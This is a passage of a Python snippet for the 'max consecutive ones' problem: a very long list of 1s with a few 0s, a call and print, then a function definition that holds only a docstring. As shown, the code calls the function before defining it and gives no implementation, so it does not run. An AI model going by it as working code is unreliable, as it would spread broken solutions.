,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1]
output = findMaxConsecutiveOnes(input)
print(output)
def findMaxConsecutiveOnes(nums):
    """Return the length of the longest run of consecutive 1s in *nums*.

    Args:
        nums: iterable of numbers (LeetCode 485 guarantees 0/1 entries, but
            any non-1 value is treated as a run breaker here).

    Returns:
        int: length of the longest run of 1s; 0 for an empty input.
    """
